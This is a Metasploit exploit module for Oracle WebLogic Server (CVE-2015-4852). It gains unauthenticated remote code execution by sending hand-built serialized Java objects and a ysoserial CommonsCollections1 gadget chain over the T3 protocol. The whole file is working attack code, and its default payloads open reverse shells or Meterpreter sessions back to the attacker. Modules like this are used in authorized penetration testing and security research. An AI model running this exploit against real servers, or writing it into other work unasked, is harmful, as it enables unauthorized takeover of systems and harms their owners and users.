require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)
to the interface to execute code on vulnerable hosts.
},
'Author' =>
[
'Andres Rodriguez',
'Stephen Breen',
'Aaron Soto'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-4852']
],
'Privileged' => false,
'Platform' => %w{ unix win solaris },
'Targets' =>
[
[ 'Unix',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
'Payload' => {
'Encoder' => 'cmd/ifs',
'BadChars' => ' ',
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
}
],
[ 'Windows',
'Platform' => 'win',
'Payload' => {},
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
],
[ 'Solaris',
'Platform' => 'solaris',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat'=>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 28 2015'))
register_options([Opt::RPORT(7001)])
end
=begin This check is currently incompatible with the Tcp mixin.:-(
def check
resp = send_request_cgi(
'method' => 'GET',
'uri'=> '/console/login/LoginForm.jsp'
)
return CheckCode::Unknown unless resp && resp.code == 200
unless resp.body.include?('Oracle WebLogic Server Administration Console')
vprint_warning("Oracle WebLogic Server banner cannot be found")
return CheckCode::Unknown
end
/WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
unless version
vprint_warning("Oracle WebLogic Server version cannot be found")
return CheckCode::Unknown
end
version = Gem::Version.new(version)
vprint_good("Detected Oracle WebLogic Server Version: #{version}")
case
when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
when version.to_s.start_with?('12.1.2')
return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')
when version.to_s.start_with?('12.1.3')
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end
return CheckCode::Safe
end
=end
def t3_handshake
shake = "t3 12.2.1\n"
shake << "AS:255\n"
shake << "HL:19\n"
shake << "MS:10000000\n\n"
sock.put(shake)
sleep(1)
sock.get_once
end
def build_t3_request_object
data ='000005c3'
data << '01'
data << '65'
data << '01'
data << 'ffffffff'
data << 'ffffffff'
data << '0000006a'
data << '0000ea60'
data << '0000001900937b484a'
data << '56fa4a777666f581daa4f5b90e2aebfc607499'
data << 'b4027973720078720178720278700000000a00'
data << '00000300000000000000060070707070707000'
data << '00000a000000030000000000000006007006'
data << 'fe010000'
data << 'aced0005'
data << '73'
data << '72001d'
data << '7765626c6f6769632e726a766d2e436c617373'
data << '5461626c65456e747279'
data << '2f52658157f4f9ed'
data << '0c00007870'
data << '72'
data << '00247765626c6f6769632e636f6d6d6f6e2e696e74'
data << '65726e616c2e5061636b616765496e666f'
data << 'e6f723e7b8ae1ec9'
data << '02'
data << '0008'
data << '4900056d616a6f72'
data << '4900056d696e6f72'
data << '49000c726f6c6c696e675061746368'
data << '49000b736572766963655061636b'
data << '5a000e74656d706f726172795061746368'
data << '4c0009696d706c5469746c65'
data << '7400124c6a6176612f6c616e672f537472696e673b'
data << '4c000a696d706c56656e646f72'
data << '71007e0003'
data << '4c000b696d706c56657273696f6e'
data << '71007e0003'
data << '78707702000078'
data << 'fe010000'
data << 'aced0005'
data << '7372'
data << '001d7765626c6f6769632e726a766d2e436c6173'
data << '735461626c65456e747279'
data << '2f52658157f4f9ed'
data << '0c'
data << '00007870'
data << '72'
data << '00247765626c6f6769632e636f6d6d6f6e2e696'
data << 'e7465726e616c2e56657273696f6e496e666f'
data << '972245516452463e'
data << '02'
data << '0003'
data << '5b0008'
data << '7061636b61676573'
data << '740027'
data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'
data << '6e7465726e616c2f5061636b616765496e666f'
data << '3b'
data << '4c000e'
data << '72656c6561736556657273696f6e'
data << '740012'
data << '4c6a6176612f6c616e672f537472696e673b'
data << '5b0012'
data << '76657273696f6e496e666f41734279746573'
data << '740002'
data << '5b42'
data << '78'
data << '720024'
data << '7765626c6f6769632e636f6d6d6f6e2e696e'
data << '7465726e616c2e5061636b616765496e666f'
data << 'e6f723e7b8ae1ec9'
data << '02'
data << '0008'
data << '4900056d616a6f72'
data << '4900056d696e6f72'
data << '49000c726f6c6c696e675061746368'
data << '49000b736572766963655061636b'
data << '5a000e74656d706f726172795061746368'
data << '4c0009696d706c5469746c65'
data << '71'
data << '007e0004'
data << '4c000a696d706c56656e646f72'
data << '71'
data << '007e0004'
data << '4c000b696d706c56657273696f6e'
data << '71'
data << '007e0004'
data << '78'
data << '70'
data << '77020000'
data << '78'
data << 'fe010000'
data << 'aced0005'
data << '73'
data << '72001d'
data << '7765626c6f6769632e726a766d2e436c617373'
data << '5461626c65456e747279'
data << '2f52658157f4f9ed'
data << '0c00007870'
data << '720021'
data << '7765626c6f6769632e636f6d6d6f6e2e696e74'
data << '65726e616c2e50656572496e666f'
data << '585474f39bc908f1'
data << '02'
data << '0006'
data << '4900056d616a6f72'
data << '4900056d696e6f72'
data << '49000c726f6c6c696e675061746368'
data << '49000b736572766963655061636b'
data << '5a000e74656d706f726172795061746368'
data << '5b00087061636b61676573'
data << '740027'
data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'
data << '6e7465726e616c2f5061636b616765496e666f'
data << '3b'
data << '78'
data << '720024'
data << '7765626c6f6769632e636f6d6d6f6e2e696e74'
data << '65726e616c2e56657273696f6e496e666f'
data << '972245516452463e'
data << '02'
data << '0003'
data << '5b0008'
data << '7061636b6167657371'
data << '007e0003'
data << '4c000e72656c6561736556657273696f6e'
data << '7400124c6a6176612f6c616e672f537472696e673b'
data << '5b001276657273696f6e496e666f41734279746573'
data << '740002'
data << '5b42'
data << '78'
data << '720024'
data << '7765626c6f6769632e636f6d6d6f6e2e696e746572'
data << '6e616c2e5061636b616765496e666f'
data << 'e6f723e7b8ae1ec9'
data << '02'
data << '0008'
data << '4900056d616a6f72'
data << '4900056d696e6f72'
data << '49000c726f6c6c696e675061746368'
data << '49000b736572766963655061636b'
data << '5a000e74656d706f726172795061746368'
data << '4c0009696d706c5469746c65'
data << '71'
data << '007e0005'
data << '4c000a696d706c56656e646f72'
data << '71'
data << '007e0005'
data << '4c000b696d706c56657273696f6e'
data << '71'
data << '007e0005'
data << '78'
data << '707702000078'
data << 'fe00ff'
data << 'fe010000'
data << 'aced0005'
data << '73'
data << '720013'
data << '7765626c6f6769632e726a766d2e4a564d4944'
data << 'dc49c23ede121e2a'
data << '0c'
data << '0000'
data << '78'
data << '70'
data << '7750'
data << '21'
data << '000000000000000000'
data << '0d'
data << '3030302e3030302e3030302e30'
data << '00'
data << '12'
data << rand_text_alphanumeric(18).unpack('H*')[0]
data << '83348cd6'
data << '000000070000'
data << rport.to_s(16).rjust(4, '0')
data << 'ffffffffffffffffffffffffffffffffffffff'
data << 'ffffffffff'
data << '78'
data << 'fe010000'
data << 'aced0005'
data << '73'
data << '72'
data << '00137765626c6f6769632e726a766d2e4a564d4944'
data << 'dc49c23ede121e2a'
data << '0c'
data << '0000'
data << '78'
data << '70'
data << '77'
data << '20'
data << '0114dc42bd071a772700'
data << '0d'
data << '3030302e3030302e3030302e30'
data << rand_text_alphanumeric(4).unpack('H*')[0]
data << '00000000'
data << '78'
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def send_payload_objdata
if target.name == 'Windows'
mycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
elsif target.name == 'Unix' || target.name == 'Solaris'
mycmd = payload.encoded
end
payload = '056508000000010000001b0000005d0101007372017870737202787000000000'
payload << '00000000757203787000000000787400087765626c6f67696375720478700000'
payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'
payload << 'fe010000'
payload << 'aced0005'
payload << '73'
payload << '72'
payload << '001d7765626c6f6769632e726a766d2e436c61'
payload << '73735461626c65456e747279'
payload << '2f52658157f4f9ed'
payload << '0c'
payload << '0000'
payload << '7870'
payload << '72'
payload << '00025b42'
payload << 'acf317f8060854e0'
payload << '02'
payload << '0000'
payload << '7870'
payload << '77'
payload << '020000'
payload << '78'
payload << 'fe010000'
payload << 'aced0005'
payload << '73'
payload << '72'
payload << '001d7765626c6f6769632e726a766d2e436c61'
payload << '73735461626c65456e747279'
payload << '2f52658157f4f9ed'
payload << '0c'
payload << '0000'
payload << '7870'
payload << '72'
payload << '00135b4c6a6176612e6c616e672e4f626a'
payload << '6563743b'
payload << '90ce589f1073296c'
payload << '02'
payload << '0000'
payload << '7870'
payload << '77'
payload << '020000'
payload << '78'
payload << 'fe010000'
payload << 'aced0005'
payload << '73'
payload << '72'
payload << '001d7765626c6f6769632e726a766d2e436c61'
payload << '73735461626c65456e747279'
payload << '2f52658157f4f9ed'
payload << '0c'
payload << '0000'
payload << '7870'
payload << '72'
payload << '00106a6176612e7574696c2e566563746f72'
payload << 'd9977d5b803baf01'
payload << '03'
payload << '0003'
payload << '4900116361706163697479496e6372656d656e74'
payload << '49000c656c656d656e74436f756e74'
payload << '5b000b656c656d656e7444617461'
payload << '7400135b4c6a6176612f6c616e672f4f626a6563'
payload << '743b'
payload << '7870'
payload << '77'
payload << '020000'
payload << '78'
payload << 'fe010000'
ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload("CommonsCollections1",mycmd)
payload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
payload << 'fe010000'
payload << 'aced0005'
payload << '73'
payload << '72'
payload << '00257765626c6f6769632e726a766d2e496d6d75'
payload << '7461626c6553657276696365436f6e74657874'
payload << 'ddcba8706386f0ba'
payload << '0c'
payload << '0000'
payload << '78'
payload << '72'
payload << '00297765626c6f6769632e726d692e70726f76'
payload << '696465722e426173696353657276696365436f'
payload << '6e74657874'
payload << 'e4632236c5d4a71e'
payload << '0c'
payload << '0000'
payload << '7870'
payload << '77'
payload << '020600'
payload << '7372'
payload << '00267765626c6f6769632e726d692e696e7465'
payload << '726e616c2e4d6574686f644465736372697074'
payload << '6f72'
payload << '12485a828af7f67b'
payload << '0c'
payload << '0000'
payload << '7870'
payload << '77'
payload << rand_text_alphanumeric(52).unpack('H*')[0]
payload << '78'
payload << '78'
payload << 'fe00ff'
data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
data << payload
sock.put([data].pack('H*'))
sleep(1)
sock.get_once
end
def exploit
connect
print_status('Sending handshake...')
t3_handshake
print_status('Sending T3 request object...')
build_t3_request_object
print_status('Sending client object payload...')
send_payload_objdata
handler
disconnect
end
end
